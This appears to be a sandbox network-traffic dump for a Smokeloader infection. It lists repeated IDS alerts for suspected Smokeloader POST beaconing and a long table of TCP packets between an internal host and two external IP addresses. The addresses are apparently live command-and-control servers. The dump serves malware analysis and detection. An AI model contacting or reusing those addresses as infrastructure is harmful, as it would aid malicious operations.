                                                                    2024-10-14T06:03:05.160241+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649999125.7.253.1080TCP
                                                                    2024-10-14T06:03:06.773833+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650001125.7.253.1080TCP
                                                                    2024-10-14T06:03:08.494699+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650002125.7.253.1080TCP
                                                                    2024-10-14T06:03:10.116735+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650003125.7.253.1080TCP
                                                                    2024-10-14T06:03:11.620256+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650004125.7.253.1080TCP
                                                                    2024-10-14T06:03:13.111163+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650005125.7.253.1080TCP
                                                                    2024-10-14T06:03:14.871674+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650006125.7.253.1080TCP
                                                                    2024-10-14T06:03:16.441473+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650007125.7.253.1080TCP
                                                                    2024-10-14T06:03:18.047258+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650008125.7.253.1080TCP
                                                                    2024-10-14T06:03:19.642690+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650009125.7.253.1080TCP
                                                                    2024-10-14T06:03:21.149882+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650010125.7.253.1080TCP
                                                                    2024-10-14T06:03:22.762582+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650011125.7.253.1080TCP
                                                                    2024-10-14T06:03:24.252561+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650012125.7.253.1080TCP
                                                                    2024-10-14T06:03:25.849542+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650013125.7.253.1080TCP
                                                                    2024-10-14T06:03:27.421559+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650014125.7.253.1080TCP
                                                                    2024-10-14T06:03:29.192946+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650015125.7.253.1080TCP
                                                                    2024-10-14T06:03:30.817494+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650016125.7.253.1080TCP
                                                                    2024-10-14T06:03:32.304663+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650017125.7.253.1080TCP
                                                                    2024-10-14T06:03:34.246847+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650018125.7.253.1080TCP
                                                                    2024-10-14T06:03:36.144916+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650019125.7.253.1080TCP
                                                                    2024-10-14T06:04:45.418789+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650023125.7.253.1080TCP
                                                                    2024-10-14T06:04:51.149380+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650024125.7.253.1080TCP
                                                                    2024-10-14T06:04:58.244487+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650025125.7.253.1080TCP
                                                                    2024-10-14T06:05:04.062889+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650026125.7.253.1080TCP
                                                                    2024-10-14T06:05:10.088773+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650027125.7.253.1080TCP
                                                                    2024-10-14T06:05:18.035144+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650028211.171.233.12980TCP
                                                                    2024-10-14T06:05:24.004900+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650030211.171.233.12980TCP
                                                                    2024-10-14T06:05:31.785512+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650031211.171.233.12980TCP
                                                                    2024-10-14T06:05:37.620142+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650032211.171.233.12980TCP
                                                                    2024-10-14T06:05:43.752844+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650033211.171.233.12980TCP
                                                                    2024-10-14T06:05:49.451325+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650034211.171.233.12980TCP
                                                                    2024-10-14T06:05:55.638546+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650035211.171.233.12980TCP
                                                                    2024-10-14T06:06:00.592981+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650036211.171.233.12980TCP
                                                                    2024-10-14T06:06:06.826789+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650037211.171.233.12980TCP
                                                                    2024-10-14T06:06:13.270043+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.650038211.171.233.12980TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 14, 2024 06:02:40.025950909 CEST4986280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:40.032541990 CEST8049862125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:40.032609940 CEST4986280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:40.032846928 CEST4986280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:40.032867908 CEST4986280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:40.040524006 CEST8049862125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:40.040539026 CEST8049862125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:41.580789089 CEST8049862125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:41.580813885 CEST8049862125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:41.580888033 CEST4986280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:41.581661940 CEST4986280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:41.587639093 CEST8049862125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:41.589195967 CEST4987380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:41.594316959 CEST8049873125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:41.594394922 CEST4987380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:41.594649076 CEST4987380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:41.594671965 CEST4987380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:41.599529028 CEST8049873125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:41.599581957 CEST8049873125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:43.242265940 CEST8049873125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:43.242290020 CEST8049873125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:43.242368937 CEST4987380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:43.242588997 CEST4987380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:43.246500015 CEST4988480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:43.247342110 CEST8049873125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:43.254968882 CEST8049884125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:43.255060911 CEST4988480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:43.255192995 CEST4988480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:43.255213976 CEST4988480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:43.262501955 CEST8049884125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:43.262671947 CEST8049884125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:44.741344929 CEST8049884125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:44.741503954 CEST8049884125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:44.741563082 CEST4988480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:44.741604090 CEST4988480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:44.744487047 CEST4989580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:44.746642113 CEST8049884125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:44.749469995 CEST8049895125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:44.749548912 CEST4989580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:44.749665976 CEST4989580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:44.749686003 CEST4989580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:44.754625082 CEST8049895125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:44.754796028 CEST8049895125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:46.242067099 CEST8049895125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:46.242105961 CEST8049895125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:46.242232084 CEST4989580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:46.242408991 CEST4989580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:46.244980097 CEST4990680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:46.247126102 CEST8049895125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:46.249728918 CEST8049906125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:46.249994993 CEST4990680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:46.250042915 CEST4990680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:46.250042915 CEST4990680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:46.254798889 CEST8049906125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:46.254945993 CEST8049906125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:47.819247007 CEST8049906125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:47.819500923 CEST8049906125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:47.819582939 CEST4990680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:47.819700003 CEST4990680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:47.822145939 CEST4991780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:47.824464083 CEST8049906125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:47.827965021 CEST8049917125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:47.828056097 CEST4991780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:47.828154087 CEST4991780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:47.828191996 CEST4991780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:47.833005905 CEST8049917125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:47.833122969 CEST8049917125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:49.335956097 CEST8049917125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:49.336078882 CEST8049917125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:49.336141109 CEST4991780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:49.336230993 CEST4991780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:49.339163065 CEST4992880192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:49.341037035 CEST8049917125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:49.343990088 CEST8049928125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:49.344108105 CEST4992880192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:49.344197035 CEST4992880192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:49.344212055 CEST4992880192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:49.348948002 CEST8049928125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:49.348958015 CEST8049928125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:50.857863903 CEST8049928125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:50.857980013 CEST8049928125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:50.858356953 CEST4992880192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:50.858356953 CEST4992880192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:50.861288071 CEST4993980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:50.863296032 CEST8049928125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:50.866193056 CEST8049939125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:50.866262913 CEST4993980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:50.866394997 CEST4993980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:50.866425037 CEST4993980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:50.871141911 CEST8049939125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:50.871159077 CEST8049939125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:52.382548094 CEST8049939125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:52.382668018 CEST8049939125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:52.382811069 CEST4993980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:52.382857084 CEST4993980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:52.385863066 CEST4994980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:52.388874054 CEST8049939125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:52.391772032 CEST8049949125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:52.391956091 CEST4994980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:52.391983032 CEST4994980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:52.392024040 CEST4994980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:52.412863970 CEST8049949125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:52.412879944 CEST8049949125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:53.929398060 CEST8049949125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:53.929459095 CEST8049949125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:53.931040049 CEST4994980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:53.932104111 CEST4994980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:53.937017918 CEST8049949125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:53.939063072 CEST4996080192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:53.944382906 CEST8049960125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:53.947237968 CEST4996080192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:53.950583935 CEST4996080192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:53.950615883 CEST4996080192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:53.956269979 CEST8049960125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:53.956836939 CEST8049960125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:55.571316004 CEST8049960125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:55.571408987 CEST8049960125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:55.571568012 CEST4996080192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:55.571636915 CEST4996080192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:55.574814081 CEST4997280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:55.577410936 CEST8049960125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:55.579849958 CEST8049972125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:55.579982996 CEST4997280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:55.580125093 CEST4997280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:55.580125093 CEST4997280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:55.584933996 CEST8049972125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:55.585016966 CEST8049972125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:57.199507952 CEST8049972125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:57.199559927 CEST8049972125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:57.199667931 CEST4997280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:57.200160980 CEST4997280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:57.203012943 CEST4998380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:57.204972982 CEST8049972125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:57.207842112 CEST8049983125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:57.207912922 CEST4998380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:57.208039999 CEST4998380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:57.208080053 CEST4998380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:57.212776899 CEST8049983125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:57.212939024 CEST8049983125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:58.792424917 CEST8049983125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:58.792507887 CEST8049983125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:58.792798996 CEST4998380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:58.792840004 CEST4998380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:58.795728922 CEST4999480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:58.797585964 CEST8049983125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:58.800518990 CEST8049994125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:58.800605059 CEST4999480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:58.800740957 CEST4999480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:58.800764084 CEST4999480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:02:58.805566072 CEST8049994125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:02:58.805588961 CEST8049994125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:00.281709909 CEST8049994125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:00.282293081 CEST8049994125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:00.282604933 CEST4999480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:00.303474903 CEST4999480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:00.308234930 CEST8049994125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:00.425460100 CEST4999680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:00.430283070 CEST8049996125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:00.430362940 CEST4999680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:00.430532932 CEST4999680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:00.430532932 CEST4999680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:00.435278893 CEST8049996125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:00.435607910 CEST8049996125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:02.013729095 CEST8049996125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:02.013747931 CEST8049996125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:02.013801098 CEST4999680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:02.013972998 CEST4999680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:02.016624928 CEST4999780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:02.018723965 CEST8049996125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:02.021451950 CEST8049997125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:02.021528006 CEST4999780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:02.021666050 CEST4999780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:02.021719933 CEST4999780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:02.026429892 CEST8049997125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:02.026612997 CEST8049997125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:03.632520914 CEST8049997125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:03.632677078 CEST8049997125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:03.632852077 CEST4999780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:03.632947922 CEST4999780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:03.635435104 CEST4999980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:03.637784958 CEST8049997125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:03.640347004 CEST8049999125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:03.640429974 CEST4999980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:03.640562057 CEST4999980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:03.640578985 CEST4999980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:03.645299911 CEST8049999125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:03.645558119 CEST8049999125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:05.159991026 CEST8049999125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:05.160130978 CEST8049999125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:05.160240889 CEST4999980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:05.160463095 CEST4999980192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:05.165219069 CEST8049999125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:05.168296099 CEST5000180192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:05.173109055 CEST8050001125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:05.173202038 CEST5000180192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:05.173413038 CEST5000180192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:05.173717022 CEST5000180192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:05.178136110 CEST8050001125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:05.178442001 CEST8050001125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:06.773724079 CEST8050001125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:06.773763895 CEST8050001125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:06.773833036 CEST5000180192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:06.774007082 CEST5000180192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:06.777297020 CEST5000280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:06.780149937 CEST8050001125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:06.783360004 CEST8050002125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:06.783536911 CEST5000280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:06.783716917 CEST5000280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:06.783741951 CEST5000280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:06.789134026 CEST8050002125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:06.789211988 CEST8050002125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:08.494596004 CEST8050002125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:08.494635105 CEST8050002125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:08.494692087 CEST8050002125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:08.494699001 CEST5000280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:08.494736910 CEST5000280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:08.494962931 CEST5000280192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:08.497975111 CEST5000380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:08.499794960 CEST8050002125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:08.502835035 CEST8050003125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:08.502958059 CEST5000380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:08.503218889 CEST5000380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:08.503252983 CEST5000380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:08.508008957 CEST8050003125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:08.508171082 CEST8050003125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:10.116532087 CEST8050003125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:10.116662979 CEST8050003125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:10.116734982 CEST5000380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:10.117698908 CEST5000380192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:10.121913910 CEST5000480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:10.122476101 CEST8050003125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:10.126740932 CEST8050004125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:10.126835108 CEST5000480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:10.127156973 CEST5000480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:10.127182007 CEST5000480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:10.131994009 CEST8050004125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:10.132005930 CEST8050004125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:11.620177984 CEST8050004125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:11.620196104 CEST8050004125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:11.620255947 CEST5000480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:11.620501995 CEST5000480192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:11.623652935 CEST5000580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:11.628087044 CEST8050004125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:11.631289959 CEST8050005125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:11.631561041 CEST5000580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:11.631721020 CEST5000580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:11.631755114 CEST5000580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:11.638897896 CEST8050005125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:11.638907909 CEST8050005125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:13.110871077 CEST8050005125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:13.111001968 CEST8050005125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:13.111162901 CEST5000580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:13.111265898 CEST5000580192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:13.113769054 CEST5000680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:13.116951942 CEST8050005125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:13.119976997 CEST8050006125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:13.120055914 CEST5000680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:13.120213985 CEST5000680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:13.120213985 CEST5000680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:13.126080990 CEST8050006125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:13.126672983 CEST8050006125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:14.871304035 CEST8050006125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:14.871526003 CEST8050006125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:14.871674061 CEST5000680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:14.871865988 CEST5000680192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:14.874526978 CEST5000780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:14.876704931 CEST8050006125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:14.879425049 CEST8050007125.7.253.10192.168.2.6
                                                                    Oct 14, 2024 06:03:14.883253098 CEST5000780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:14.883373976 CEST5000780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:14.883388996 CEST5000780192.168.2.6125.7.253.10
                                                                    Oct 14, 2024 06:03:14.888149023 CEST8050007125.7.253.10192.168.2.6
